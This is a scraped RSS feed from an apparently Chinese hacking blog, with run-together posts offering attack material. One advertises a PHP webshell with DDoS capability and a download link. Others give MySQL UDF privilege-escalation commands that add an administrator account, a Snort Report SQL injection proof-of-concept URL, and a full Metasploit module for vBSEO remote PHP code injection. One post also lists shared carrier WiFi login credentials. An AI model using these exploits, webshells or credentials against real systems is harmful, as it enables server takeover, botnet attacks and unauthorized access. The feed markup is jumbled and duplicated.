查看/var/log&nbsp;文件夹内容#&nbsp;ls&nbsp;-al&nbsp;/var/log</p><img src="http://www1.feedsky.com/t1/603220389/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1803" border="0" height="0" width="0" style="position:absolute" />黑客攻防Tue, 14 Feb 2012 12:22:39 +0800kawenhttp://www.cnyzy.cn/blogview.asp?logID=1803#commenthttp://www.cnyzy.cn/blogview.asp?logID=1803kawenhttp://www.cnyzy.cn/blogview.asp?logID=1803http://www.cnyzy.cn/blogfeed.aspfeedsky/cnyzy/~1471012/603220389/1477126集管理、压力测试、查询服务器等一体的PHP大马http://www.cnyzy.cn/blogview.asp?logID=1802<p id=fp>本软件仅供爱好者研究测试之用!<br><br>首先,PHP&nbsp;DDOS&nbsp;是很久前的技术,现在发出来,综合了PHP&nbsp;大马的服务器提权测试功能。<br><br>集于管理、压力测试、菜刀通用、查询服务器信息等技术于一体。<br><br>1&nbsp;管理就不多说,大家都知道。<br><br>2&nbsp;压力测试,用附带的工具进行测试,最小包1万,最大包65500,可以检测是否存在。<br><br>3&nbsp;菜刀通用,可用菜刀直接进行连接,密码为WEBSHELL登陆密码。&nbsp;&nbsp;新功能<br><br>4&nbsp;查询服务器信息,查询PR,收录,权重于一体,权重获取数据标准为爱站。<br><br>..其他的没什么多说的了,SHELL没有做免杀,原码,大家凑货使,以后自己加密。。<br><br>工具使用,添加完SHELL后要导出为config.ini,否则不自动保存的。<br><br><br>最后一点,ASP的WEBSHELL很多支持PHP的,附带一款ASPSHELL&nbsp;大家可以检测PHP&nbsp;,支持传入即可。<br><br><br>DDOS功能是以webshell当肉鸡,PHP&nbsp;很少掉鸡,威力还蛮大,大家自己测试吧。<br><br><br>官方网站&nbsp;&nbsp;<a href="http://www.aspmuma.org/&nbsp;" target="_blank">http://www.aspmuma.org/&nbsp;</a><br><br>官方下载地址&nbsp;&nbsp;<a href="http://www.aspmuma.org/Software/Catalog7/74.html" target="_blank">http://www.aspmuma.org/Software/Catalog7/74.html</a><br><br>作者EMAIL:liuaqiangbb@163.com<br><br><a target="_blank" rel="nofollow" href="http://222.aspmuma.org/UpLoadFile/phpddos%B9%A4%BE%DF.rar">下载</a></p><img src="http://www1.feedsky.com/t1/603220390/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1802" border="0" height="0" width="0" style="position:absolute" />http://www.cnyzy.cn/trackback.asp?tbID=1802http://www.cnyzy.cn/blogfeed.asp?logID=1802<p id=fp>本软件仅供爱好者研究测试之用!<br><br>首先,PHP&nbsp;DDOS&nbsp;是很久前的技术,现在发出来,综合了PHP&nbsp;大马的服务器提权测试功能。<br><br>集于管理、压力测试、菜刀通用、查询服务器信息等技术于一体。</p><img src="http://www1.feedsky.com/t1/603220390/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1802" border="0" height="0" width="0" style="position:absolute" />资源共享Tue, 14 Feb 2012 12:22:39 +0800kawenhttp://www.cnyzy.cn/blogview.asp?logID=1802#commenthttp://www.cnyzy.cn/blogview.asp?logID=1802kawenhttp://www.cnyzy.cn/blogview.asp?logID=1802http://www.cnyzy.cn/blogfeed.aspfeedsky/cnyzy/~1471012/603220390/1477126MYSQL提权http://www.cnyzy.cn/blogview.asp?logID=1801<p id=fp>1&nbsp;获得root密码<br><br>conn.php&nbsp;config.php<br><br>&nbsp;<br><br>$dbhost&nbsp;=&nbsp;&#39;localhost&#39;;//&nbsp;数据库服务器<br><br>$dbuser&nbsp;=&nbsp;&#39;root&#39;;//&nbsp;数据库用户名<br><br>$dbpw&nbsp;=&nbsp;&#39;root&#39;;//&nbsp;数据库密码<br><br>$dbname&nbsp;=&nbsp;&#39;discuz&#39;;//&nbsp;数据库名<br><br>&nbsp;<br><br>&nbsp;<br><br>C:\Winnt\udf.dll&nbsp;&nbsp;&nbsp;&nbsp;2000<br><br>C:\Windows\udf.dll&nbsp;2003<br><br>&nbsp;<br><br>现在基本上win的服务器就这两个导出UDF.DLL<br><br>&nbsp;<br><br>create&nbsp;function&nbsp;cmdshell&nbsp;returns&nbsp;string&nbsp;soname&nbsp;&#39;udf.dll&#39;<br><br>select&nbsp;cmdshell(&#39;net&nbsp;user&nbsp;wjs&nbsp;wjs&nbsp;/add&#39;);&nbsp;&nbsp;<br><br>select&nbsp;cmdshell(&#39;net&nbsp;localgroup&nbsp;administrators&nbsp;wjs&nbsp;/add&#39;);&nbsp;&nbsp;<br><br>select&nbsp;cmdshell(&#39;C:/PHPnow/htdocs/3389.exe&#39;);&nbsp;&nbsp;这个是把开3389的文件放到C盘,然后运行,我们服务器开了3389就不需要执行这步<br><br>drop&nbsp;function&nbsp;cmdshell;&nbsp;删除函数<br><br>select&nbsp;cmdshell(&#39;netstat&nbsp;-an&#39;);&nbsp;这是查看端口查开放情况<br><br></p><img src="http://www1.feedsky.com/t1/603220391/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1801" border="0" height="0" width="0" style="position:absolute" />http://www.cnyzy.cn/trackback.asp?tbID=1801http://www.cnyzy.cn/blogfeed.asp?logID=1801<p id=fp>1&nbsp;获得root密码<br><br>conn.php&nbsp;config.php<br><br>&nbsp;</p><img src="http://www1.feedsky.com/t1/603220391/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1801" border="0" height="0" width="0" style="position:absolute" />黑客攻防Tue, 14 Feb 2012 12:22:39 +0800kawenhttp://www.cnyzy.cn/blogview.asp?logID=1801#commenthttp://www.cnyzy.cn/blogview.asp?logID=1801kawenhttp://www.cnyzy.cn/blogview.asp?logID=1801http://www.cnyzy.cn/blogfeed.aspfeedsky/cnyzy/~1471012/603220391/1477126Snort Report <= 1.3.2 SQLhttp://www.cnyzy.cn/blogview.asp?logID=1800<p id=fp><strong>Snort&nbsp;Report&nbsp;&lt;=&nbsp;1.3.2&nbsp;SQL&nbsp;Injection&nbsp;Vulnerability&nbsp;</strong><br><br>##########################&nbsp;&nbsp;<br><br>Vulnerable&nbsp;parameter:&nbsp;&nbsp;<br><br>ipAddress&nbsp;&nbsp;<br><br>Vulnerable&nbsp;URL:&nbsp;&nbsp;<br><br><a href="http://server/ipdetail.php?type=dst&amp;FQDN=&amp;ipAddress=773116111&lt;SQLi&nbsp;Here&gt;&amp;beginTime=0&amp;endTime=1324665310&nbsp;&nbsp;" target="_blank">http://server/ipdetail.php?type=dst&amp;FQDN=&amp;ipAddress=773116111&lt;SQLi&nbsp;Here&gt;&amp;beginTime=0&amp;endTime=1324665310&nbsp;&nbsp;</a><br><br>PoC:&nbsp;&nbsp;<br><br><a href="http://server/ipdetail.php?type=dst&amp;FQDN=&amp;ipAddress=773116111%20AND%20%28SELECT%205849%20FROM%28SELECT%20COUNT%28" target="_blank">http://server/ipdetail.php?type=dst&amp;FQDN=&amp;ipAddress=773116111%20AND%20%28SELECT%205849%20FROM%28SELECT%20COUNT%28</a>*%29%2CCONCAT%280x3a79786a3a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a7578713a%2CFLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29&amp;beginTime=0&amp;endTime=1324665310&nbsp;&nbsp;<br><br>##########################&nbsp;&nbsp;<br><br>#&nbsp;Patched&nbsp;in&nbsp;v1.3.3&nbsp;<br></p><img src="http://www1.feedsky.com/t1/603220392/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1800" border="0" height="0" width="0" style="position:absolute" />http://www.cnyzy.cn/trackback.asp?tbID=1800http://www.cnyzy.cn/blogfeed.asp?logID=1800<p id=fp><strong>Snort&nbsp;Report&nbsp;&lt;=&nbsp;1.3.2&nbsp;SQL&nbsp;Injection&nbsp;Vulnerability&nbsp;</strong><br><br>##########################&nbsp;&nbsp;<br><br>Vulnerable&nbsp;parameter:&nbsp;&nbsp;</p><img src="http://www1.feedsky.com/t1/603220392/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1800" border="0" height="0" width="0" style="position:absolute" />黑客攻防Tue, 14 Feb 2012 12:22:39 +0800kawenhttp://www.cnyzy.cn/blogview.asp?logID=1800#commenthttp://www.cnyzy.cn/blogview.asp?logID=1800kawenhttp://www.cnyzy.cn/blogview.asp?logID=1800http://www.cnyzy.cn/blogfeed.aspfeedsky/cnyzy/~1471012/603220392/1477126中国移动,中国电信免费公共wifi密码http://www.cnyzy.cn/blogview.asp?logID=1799<p id=fp>【中国移动公共wifi的密码】<br>卡号:15821275836密码:159258&nbsp;<br>卡号:15800449592密码:159258&nbsp;<br>卡号:15800449954密码:159258&nbsp;<br>卡号:15800449940密码:159258<br><br>中国电信但凡你的手机能搜到中国电信的chinanet的热点覆盖,全国公免账号07953591377密码3591377&nbsp;。<br><br>说明:<br>可能有很多人已经知道了,我只是给还不知道的人扫一下盲<br><br>可能有些人不知道怎么用,首先就是要你所在的地方能搜到移动或电信的公共wifi信号,目前此信号覆盖的还不是很广。但还是会有人能搜到吧,比如我!搜到之后先用你的设备连接移动的wifi网络,就会跳出网页,要你输入手机号和密码(就是我上面提供的那个),输入后可用的话,就可以上网了。</p><img src="http://www1.feedsky.com/t1/603220393/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1799" border="0" height="0" width="0" style="position:absolute" />http://www.cnyzy.cn/trackback.asp?tbID=1799http://www.cnyzy.cn/blogfeed.asp?logID=1799<p id=fp>【中国移动公共wifi的密码】<br>卡号:15821275836密码:159258&nbsp;<br>卡号:15800449592密码:159258&nbsp;<br>卡号:15800449954密码:159258&nbsp;<br>卡号:15800449940密码:159258</p><img src="http://www1.feedsky.com/t1/603220393/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1799" border="0" height="0" width="0" style="position:absolute" />业界资讯Tue, 14 Feb 2012 12:22:39 +0800kawenhttp://www.cnyzy.cn/blogview.asp?logID=1799#commenthttp://www.cnyzy.cn/blogview.asp?logID=1799kawenhttp://www.cnyzy.cn/blogview.asp?logID=1799http://www.cnyzy.cn/blogfeed.aspfeedsky/cnyzy/~1471012/603220393/1477126vBSEO <= 3.6.0 Injection Exploithttp://www.cnyzy.cn/blogview.asp?logID=1798<p id=fp><strong>vBSEO&nbsp;&lt;=&nbsp;3.6.0&nbsp;&quot;proc_deutf()&quot;&nbsp;Remote&nbsp;PHP&nbsp;Code&nbsp;Injection&nbsp;Exploit</strong><br><br><br>require&nbsp;&#39;msf/core&#39;&nbsp;<br><br>class&nbsp;Metasploit3&nbsp;&lt;&nbsp;Msf::Exploit::Remote&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;include&nbsp;Msf::Exploit::Remote::HttpClient&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;def&nbsp;initialize(info&nbsp;=&nbsp;{})&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;super(update_info(info,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Name&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;&#39;vBSEO&nbsp;&lt;=&nbsp;3.6.0&nbsp;&quot;proc_deutf()&quot;&nbsp;Remote&nbsp;PHP&nbsp;Code&nbsp;Injection&#39;,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Description&#39;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;%q{&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;This&nbsp;module&nbsp;exploits&nbsp;a&nbsp;vulnerability&nbsp;in&nbsp;the&nbsp;&#39;proc_deutf()&#39;&nbsp;function&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;defined&nbsp;in&nbsp;/includes/functions_vbseocp_abstract.php.&nbsp;User&nbsp;input&nbsp;passed&nbsp;through&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;char_repl&#39;&nbsp;POST&nbsp;parameter&nbsp;isn&#39;t&nbsp;properly&nbsp;sanitized&nbsp;before&nbsp;being&nbsp;used&nbsp;in&nbsp;a&nbsp;call&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;to&nbsp;preg_replace()&nbsp;function&nbsp;which&nbsp;uses&nbsp;the&nbsp;&#39;e&#39;&nbsp;modifier.&nbsp;This&nbsp;can&nbsp;be&nbsp;exploited&nbsp;to&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;inject&nbsp;and&nbsp;execute&nbsp;arbitrary&nbsp;code&nbsp;leveraging&nbsp;the&nbsp;PHP&#39;s&nbsp;complex&nbsp;curly&nbsp;syntax.&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;},&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Author&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;&#39;EgiX&nbsp;&lt;n0b0d13s[at]gmail.com&gt;&#39;,&nbsp;#&nbsp;originally&nbsp;reported&nbsp;by&nbsp;the&nbsp;vendor&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;License&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;MSF_LICENSE,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Version&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;&#39;$Revision$&#39;,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;References&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[&#39;BID&#39;,&nbsp;&#39;51647&#39;],&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[&#39;URL&#39;,&nbsp;&#39;<a href="http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/&#39;" target="_blank">http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/&#39;</a>],&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;],&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Privileged&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;false,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Payload&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;DisableNops&#39;&nbsp;=&gt;&nbsp;true,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Space&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;8190,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Keys&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;[&#39;php&#39;],&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;},&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Platform&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;[&#39;php&#39;],&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Arch&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;ARCH_PHP,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Targets&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;[[&nbsp;&#39;Automatic&#39;,&nbsp;{&nbsp;}]],&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;DisclosureDate&#39;&nbsp;=&gt;&nbsp;&#39;Jan&nbsp;23&nbsp;2012&#39;,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;DefaultTarget&#39;&nbsp;&nbsp;=&gt;&nbsp;0))&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;register_options(&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;OptString.new(&#39;URI&#39;,&nbsp;[true,&nbsp;&quot;The&nbsp;full&nbsp;URI&nbsp;path&nbsp;to&nbsp;vBulletin&quot;,&nbsp;&quot;/vb/&quot;]),&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;],&nbsp;self.class)&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;end&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;def&nbsp;check&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;flag&nbsp;=&nbsp;rand_text_alpha(rand(10)+10)&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;data&nbsp;=&nbsp;&quot;char_repl=&#39;{${print(#{flag})}}&#39;=&gt;&quot;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uri&nbsp;=&nbsp;&#39;&#39;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uri&nbsp;&lt;&lt;&nbsp;datastore[&#39;URI&#39;]&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uri&nbsp;&lt;&lt;&nbsp;&#39;/&#39;&nbsp;if&nbsp;uri[-1,1]&nbsp;!=&nbsp;&#39;/&#39;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uri&nbsp;&lt;&lt;&nbsp;&#39;vbseocp.php&#39;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;response&nbsp;=&nbsp;send_request_cgi({&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;method&#39;&nbsp;=&gt;&nbsp;&quot;POST&quot;,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;uri&#39;&nbsp;=&gt;&nbsp;uri,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;data&#39;&nbsp;=&gt;&nbsp;&quot;#{data}&quot;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;})&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;response.code&nbsp;==&nbsp;200&nbsp;and&nbsp;response.body&nbsp;=~&nbsp;/#{flag}/&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;Exploit::CheckCode::Vulnerable&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;Exploit::CheckCode::Safe&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;end&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;def&nbsp;exploit&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;datastore[&#39;CMD&#39;]&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;p&nbsp;=&nbsp;&quot;passthru(\&quot;%s\&quot;);&quot;&nbsp;%&nbsp;datastore[&#39;CMD&#39;]&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;p&nbsp;=&nbsp;Rex::Text.encode_base64(p)&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;p&nbsp;=&nbsp;Rex::Text.encode_base64(payload.encoded)&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;data&nbsp;=&nbsp;&quot;char_repl=&#39;{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}&#39;=&gt;&quot;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uri&nbsp;=&nbsp;&#39;&#39;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uri&nbsp;&lt;&lt;&nbsp;datastore[&#39;URI&#39;]&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uri&nbsp;&lt;&lt;&nbsp;&#39;/&#39;&nbsp;if&nbsp;uri[-1,1]&nbsp;!=&nbsp;&#39;/&#39;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uri&nbsp;&lt;&lt;&nbsp;&#39;vbseocp.php&#39;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;response&nbsp;=&nbsp;send_request_cgi({&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;method&#39;&nbsp;=&gt;&nbsp;&#39;POST&#39;,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;uri&#39;&nbsp;=&gt;&nbsp;uri,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;data&#39;&nbsp;=&gt;&nbsp;data,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;headers&#39;&nbsp;=&gt;&nbsp;{&nbsp;&#39;Code&#39;&nbsp;=&gt;&nbsp;p&nbsp;}&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;})&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print_status(&quot;%s&quot;&nbsp;%&nbsp;response.body)&nbsp;if&nbsp;datastore[&#39;CMD&#39;]&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;end&nbsp;<br><br>end&nbsp;<br></p><img src="http://www1.feedsky.com/t1/603220394/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1798" border="0" height="0" width="0" style="position:absolute" />http://www.cnyzy.cn/trackback.asp?tbID=1798http://www.cnyzy.cn/blogfeed.asp?logID=1798<p 